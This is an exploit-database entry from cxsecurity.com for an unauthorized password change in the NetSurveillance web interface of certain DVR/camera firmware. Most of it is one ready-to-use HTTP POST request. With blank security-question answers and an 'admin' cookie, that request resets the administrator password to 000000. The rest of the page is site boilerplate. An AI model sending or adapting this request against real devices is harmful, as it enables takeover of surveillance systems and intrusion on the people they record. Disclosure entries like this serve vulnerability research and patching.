NetSurveillance Unauthorized Password Change

2020.11.21
Credit: AsCiI
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: NetSurveillance Web interface password change # Google Dork: # Date: 20.10.2020 # Exploit Author: AsCiI # Vendor Homepage: # Software Link: # Version: V4.02.R11.00000140.10001.131900.00000 maybe other # Tested on: V4.02.R11.00000140.10001.131900.00000 Build Date:2017/12/6 9:4:23 # CVE : NetSurveillance Web interface password can be changed when there is no default question set, the answer will be empty Tested on System: V4.02.R11.00000140.10001.131900.00000 Build Date:2017/12/6 9:4:23 POST /result.html?cLanguage=null HTTP/1.1 Host: [Host_Name] Referer: http://[Host_Name]/reminder.html Content-Type: application/x-www-form-urlencoded Cookie: NetSuveillanceWebCookie=%7B%22username%22%3A%22admin%22%7D Unlockquestion1=Please+select+Question&Unlockanswer1=&Unlockquestion2=Please+select+Question&Unlockanswer2=&password=000000&confirpossword=000000


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top